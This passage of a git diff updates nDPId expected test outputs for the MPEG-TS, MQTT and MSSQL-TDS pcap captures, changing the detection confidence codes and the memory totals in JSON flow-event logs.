JIBBDDOFjeKiGBUEcBARooBUCpMQWTeQxgYA46QHYBoSgCIhAOgHYCcAhDKgLuTwFgEYGcAGAZAG8AmQkA1JqS0AOwG5KwBKBQAa\/Alf+AOvwSQA\/sLgKAB+GoBCAGJrko0b0gVRwSf9QHYDoNQCQAIMqMFwDWAfgQnBg\/\/mSg85hwCgAiQkoDIXkxWGAeSTGBGAFG4YCT\/6WQ+AQpqEegNiL\/GrDRqRZackiI5OrlAZ43r4E0jenh7oKAIKjCCsBbeNw5Yo42RwEBGwAfQcAcRNBC\/5Z3JpRQI\/\/QCAlBZTk2chBKACsMQM4Iv\/Q0sAiADYCqACG5YMNXMdDDQLDOOlKiWGYBLwLsCN\/1yL7bI7FfbAAoJBHItxAyYj9CFdLCexAmGGF7vB7MBLz9L5WGDsERwDwKSQJIfcYImKe4c7uIjWFSGKP7CWSAC2zwgfUBhAEzwVP\/g6IJ5OIEAD+DAC0NAQgh\/9kMhk0B1uxSAKllJDAEQYAZFAUAQgk\/+DYh9IBHH\/8Q\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/0cf\/xD\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/"} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"mpegts.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435209297954,"flow_last_seen":1435209297954,"flow_idle_time":200000,"flow_min_l4_payload_len":1316,"flow_max_l4_payload_len":1316,"flow_tot_l4_payload_len":1316,"flow_avg_l4_payload_len":1316,"midstream":0,"thread_ts_msec":1435209297954,"l3_proto":"ip4","src_ip":"10.1.16.48","dst_ip":"230.200.201.23","src_port":40737,"dst_port":1234,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MPEG_TS","breed":"Fun","category":"Media"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"mpegts.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1435209297954,"flow_last_seen":1435209297954,"flow_idle_time":200000,"flow_min_l4_payload_len":1316,"flow_max_l4_payload_len":1316,"flow_tot_l4_payload_len":1316,"flow_avg_l4_payload_len":1316,"midstream":0,"thread_ts_msec":1435209297954,"l3_proto":"ip4","src_ip":"10.1.16.48","dst_ip":"230.200.201.23","src_port":40737,"dst_port":1234,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MPEG_TS","breed":"Fun","category":"Media"}} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"mpegts.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435209297954,"flow_last_seen":1435209297954,"flow_idle_time":200000,"flow_min_l4_payload_len":1316,"flow_max_l4_payload_len":1316,"flow_tot_l4_payload_len":1316,"flow_avg_l4_payload_len":1316,"midstream":0,"thread_ts_msec":1435209297954,"l3_proto":"ip4","src_ip":"10.1.16.48","dst_ip":"230.200.201.23","src_port":40737,"dst_port":1234,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MPEG_TS","breed":"Fun","category":"Media"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"mpegts.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1435209297954,"flow_last_seen":1435209297954,"flow_idle_time":200000,"flow_min_l4_payload_len":1316,"flow_max_l4_payload_len":1316,"flow_tot_l4_payload_len":1316,"flow_avg_l4_payload_len":1316,"midstream":0,"thread_ts_msec":1435209297954,"l3_proto":"ip4","src_ip":"10.1.16.48","dst_ip":"230.200.201.23","src_port":40737,"dst_port":1234,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MPEG_TS","breed":"Fun","category":"Media"}} 00551{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"mpegts.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":1,"total-skipped-flows":0,"total-l4-payload-len":1316,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":7,"global_ts_msec":1435209297954} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1/1 @@ -13,9 +13,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869444 bytes -~~ total memory freed........: 5869444 bytes -~~ total allocations/frees...: 118114/118114 +~~ total memory allocated....: 6003078 bytes +~~ total memory freed........: 6003078 bytes +~~ total allocations/frees...: 120876/120876 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 462 chars ~~ json string max len.......: 2722 chars diff --git a/test/results/mqtt.pcap.out b/test/results/mqtt.pcap.out index 53eaafbb6..4b29cc850 100644 --- a/test/results/mqtt.pcap.out +++ b/test/results/mqtt.pcap.out @@ -3,13 +3,13 @@ 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643014009283,"flow_last_seen":1643014009283,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1643014009283,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":1883,"dst_port":41892,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1643014009283,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1643014009283,"pkt":"AAAAAAAAAAwATSywCABFAAA8AABAADQGcggKCgoBwKgAAQdbo6QZpJjZwwPwU6AS\/oijvAAAAgQFtAQCCArcK3DSu1+3wwEDAwc="} 00552{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1643014009286,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":132,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":132,"pkt_l4_len":98,"thread_ts_msec":1643014009286,"pkt":"AAAAAAAAAAwATSywCABFAAB2fFxAAD8G6nHAqAABCgoKAaOkB1vDA\/BTGaSY2oAYAOXxcQAAAQEICrtfuBTcK3DSEEAABk1RSXNkcAPCABQAFmNiYWFiY2JhYmFjYmJiYmJhYWFhYWIADDAyRDUwNTAyMjNEMwAMMDJENTA1MDIyM0Qz"} -00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1643014009283,"flow_last_seen":1643014009286,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1643014009286,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":1883,"dst_port":41892,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} +00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1643014009283,"flow_last_seen":1643014009286,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1643014009286,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":1883,"dst_port":41892,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1643014009367,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1643014009367,"pkt":"AAAAAAAAAAwATSywCABFAABUfF1AAD8G6pLAqAABCgoKAaOkB1vDA\/CVGaSY2oAYAOUsbgAAAQEICrtfuGXcK3Ejgh4AAQAZYXN0ci9zNzIwLzAyRDUwNTAyMjNEMy85OQA="} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643014349216,"flow_last_seen":1643014349216,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":1643014349216,"l3_proto":"ip4","src_ip":"100.67.35.238","dst_ip":"51.137.28.239","src_port":35035,"dst_port":1883,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00852{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1643014349216,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":355,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":355,"pkt_l4_len":317,"thread_ts_msec":1643014349216,"pkt":"AAAAAAAAAAIAAAAIgQAD8AgARQABUdTzQABABowKZEMj7jOJHO+I2wdbWSC31VrTd7uAGAGz9SgAAAEBCAoAXWNEhxKKyRCaAgAETVFUVATAAlgAEFA0Nzc3NUlEMTcwVzIxMjAASmlvdGF6ZXdwbWxpdGh1Yi5henVyZS1kZXZpY2VzLm5ldC9QNDc3NzVJRDE3MFcyMTIwLz9hcGktdmVyc2lvbj0yMDE4LTA2LTMwALBTaGFyZWRBY2Nlc3NTaWduYXR1cmUgc2lnPUtVNFVpQlRmV2UlMkZ4cyUyQmdURzVXUURMdnpyUHg0VTYySFRwU2xma2Z4cmZRJTNEJnNlPTE2NDMwMTc5NDcmc3I9aW90YXpld3BtbGl0aHViLmF6dXJlLWRldmljZXMubmV0JTJGUDQ3Nzc1SUQxNzBXMjEyMCUyRiUzRmFwaS12ZXJzaW9uJTNEMjAxOC0wNi0zMA=="} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643014349216,"flow_last_seen":1643014349216,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":1643014349216,"l3_proto":"ip4","src_ip":"100.67.35.238","dst_ip":"51.137.28.239","src_port":35035,"dst_port":1883,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1643014349216,"flow_last_seen":1643014349216,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":1643014349216,"l3_proto":"ip4","src_ip":"100.67.35.238","dst_ip":"51.137.28.239","src_port":35035,"dst_port":1883,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} -00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1643014009283,"flow_last_seen":1643014010972,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":392,"flow_tot_l4_payload_len":590,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1643014349216,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":1883,"dst_port":41892,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643014349216,"flow_last_seen":1643014349216,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":1643014349216,"l3_proto":"ip4","src_ip":"100.67.35.238","dst_ip":"51.137.28.239","src_port":35035,"dst_port":1883,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1643014349216,"flow_last_seen":1643014349216,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":1643014349216,"l3_proto":"ip4","src_ip":"100.67.35.238","dst_ip":"51.137.28.239","src_port":35035,"dst_port":1883,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} +00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1643014009283,"flow_last_seen":1643014010972,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":392,"flow_tot_l4_payload_len":590,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1643014349216,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":1883,"dst_port":41892,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} 00549{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":9,"source":"mqtt.pcap","alias":"nDPId-test","packets-captured":9,"packets-processed":9,"total-skipped-flows":0,"total-l4-payload-len":875,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":13,"global_ts_msec":1643014349216} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 9/9 @@ -19,9 +19,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5870764 bytes -~~ total memory freed........: 5870764 bytes -~~ total allocations/frees...: 118127/118127 +~~ total memory allocated....: 6004398 bytes +~~ total memory freed........: 6004398 bytes +~~ total allocations/frees...: 120889/120889 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 460 chars ~~ json string max len.......: 857 chars diff --git a/test/results/mssql_tds.pcap.out b/test/results/mssql_tds.pcap.out index 78c4cca94..8e3220b8e 100644 --- a/test/results/mssql_tds.pcap.out +++ b/test/results/mssql_tds.pcap.out @@ -2,61 +2,61 @@ 00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"mssql_tds.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1240877917888} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1240877917888,"flow_last_seen":1240877917888,"flow_idle_time":7580000,"flow_min_l4_payload_len":190,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1240877917888,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":1111,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00725{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1240877917888,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":256,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":256,"pkt_l4_len":222,"thread_ts_msec":1240877917888,"pkt":"AAwpiUrKAFBWwAABCABFAADynIJAAEAGGaUKb29vCgAAAQRXBZk+5C72WSFQkoAYAFx5qQAAAQEICgQLsN8AAVvMAQEAvgAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAAIABzAGUAdAAgAHQAcgBhAG4AcwBhAGMAdABpAG8AbgAgAGkAcwBvAGwAYQB0AGkAbwBuACAAbABlAHYAZQBsACAAIAByAGUAYQBkACAAYwBvAG0AbQBpAHQAdABlAGQAIAAgAHMAZQB0ACAAaQBtAHAAbABpAGMAaQB0AF8AdAByAGEAbgBzAGEAYwB0AGkAbwBuAHMAIABvAGYAZgAgAA=="} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1240877917888,"flow_last_seen":1240877917888,"flow_idle_time":7580000,"flow_min_l4_payload_len":190,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1240877917888,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":1111,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1240877917888,"flow_last_seen":1240877917888,"flow_idle_time":7580000,"flow_min_l4_payload_len":190,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1240877917888,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":1111,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1240877917888,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":100,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":100,"pkt_l4_len":66,"thread_ts_msec":1240877917888,"pkt":"AFBWwAABAAwpiUrKCABFAABWA25AAIAGc1UKAAABCm9vbwWZBFdZIVCSPuQvtIAYQa2\/wgAAAQEICgABW8wEC7DfBAEAIgA1AQD9AQD5AAAAAAAAAAAA\/QAAugAAAAAAAAAAAA=="} 00863{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1240877917918,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":358,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":358,"pkt_l4_len":324,"thread_ts_msec":1240877917918,"pkt":"AAwpiUrKAFBWwAABCABFAAFYnINAAEAGGT4Kb29vCgAAAQRXBZk+5C+0WSFQtIAYAFxIvAAAAQEICgQLsOcAAVvMAwEBJAAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAA\/\/8NAAAAAAEmBAQAAAAAAADnQB8JBNAANDQAQABQADAAIABuAHYAYQByAGMAaABhAHIAKAA0ADAAMAAwACkALABAAFAAMQAgAGkAbgB0AAAA50AfCQTQADSQAHMAZQBsAGUAYwB0ACAAKgAgAGYAcgBvAG0AIAB0AGUAcwB0AF8AdABhAGIAbABlAF8AMQAgAHcAaABlAHIAZQAgAG4AYQBtAGUAIAA9ACAAQABQADAAIABhAG4AZAAgAGkAZAAgAD0AIABAAFAAMQAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAAAA50AfCQTQADQGAHoAegB6AAAAJgQEAgAAAA=="} 00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":5,"source":"mssql_tds.pcap","alias":"nDPId-test","packets-captured":5,"packets-processed":4,"total-skipped-flows":0,"total-l4-payload-len":874,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1259762400004} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400004,"flow_last_seen":1259762400004,"flow_idle_time":7580000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":1,"thread_ts_msec":1259762400004,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":2222,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1259762400004,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1259762400004,"pkt":"ABj+dhvGERERERESCABFAABUAAdAAEAGtr4Kb29vCgAAAQiuBZn\/ymPG\/zlOU1AYEAArKgAAAQEALAAAAQBDAE8ATQBNAEkAVAAgAFQAUgBBAE4AUwBBAEMAVABJAE8ATgA="} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400004,"flow_last_seen":1259762400004,"flow_idle_time":7580000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":1,"thread_ts_msec":1259762400004,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":2222,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400004,"flow_last_seen":1259762400004,"flow_idle_time":7580000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":1,"thread_ts_msec":1259762400004,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":2222,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1259762400004,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1259762400004,"pkt":"ABj+dhvGERERERESCABFAAA5AAhAAEAGttgKAAABCm9vbwWZCK7\/OU5T\/8pj8lAYEABYKQAABAEAEQE6AQD9AADVAAAAAAA="} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400022,"flow_last_seen":1259762400022,"flow_idle_time":7580000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":185,"midstream":1,"thread_ts_msec":1259762400022,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":3333,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 